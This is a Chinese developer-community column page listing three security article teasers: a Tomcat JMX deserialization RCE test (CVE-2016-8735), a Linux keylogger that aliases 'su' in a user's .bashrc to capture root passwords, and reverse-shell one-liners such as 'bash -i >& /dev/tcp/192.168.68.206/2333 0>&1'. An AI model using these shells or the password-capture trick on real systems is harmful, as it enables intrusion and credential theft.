腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
Urahara Blog
专栏成员
举报
34
文章
43735
阅读量
25
订阅数
订阅专栏
申请加入专栏
全部文章(34)
网络安全(8)
安全(7)
php(6)
shell(6)
sql(4)
http(4)
windows(4)
bash(3)
json(3)
数据库(3)
linux(3)
https(3)
其他(2)
java(2)
python(2)
javascript(2)
xml(2)
云数据库 Redis(2)
apache(2)
编程算法(2)
开源(2)
ssh(2)
dns(2)
powershell(2)
html(1)
云数据库 SQL Server(1)
access(1)
git(1)
github(1)
jar(1)
struts(1)
tomcat(1)
bash 指令(1)
apt-get(1)
spring(1)
文件存储(1)
爬虫(1)
安全漏洞(1)
搜索文章
搜索
搜索
关闭
Apache Tomcat Remote Code Execution(CVE-2016-8735)
tomcat
安全
linux
bash
bash 指令
这个漏洞实质还是JMX反序列化漏洞,tomcat同样也用了JmxRemoteLifecycleListener这个监听器,但是tomcat在Oracle修复这个漏洞后自己没有及时更新,导致了反序列还依旧存在。网上搜了很多关于该漏洞的分析文章基本上都是0c0c0f牛在微信公众号里文章的转载或是变种,也基本都是在window系统上做的测试,所以也就想在linux也测试一下,也就有了这篇文章,大牛们勿喷呐= =、。
风流
2019-12-10
1.2K
0
Keyboard Logger On Linux - Part 1
linux
bash
python
alias su keylogger 在一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’,低权限用户su root后成功记录密码,但使用这种方法后管理员无法正常su切换至root用户下,所以比较容易被管理员发现。密码记录路径请看脚本。 #!/usr/bin/python # -*- coding: cp936 -*- import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%
风流
2018-06-07
1K
0
Some Ways To Create An Interactive Shell On Linux
shell
linux
bash
python
Bash $ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1 $ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196 $ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | while read line; do $line 2>&5 >&5;done $ exec 5<>/dev/tcp/192.168.68.206/2333 cat <&5 | wh
风流
2018-06-07
885
0
没有更多了
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
立即查看
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档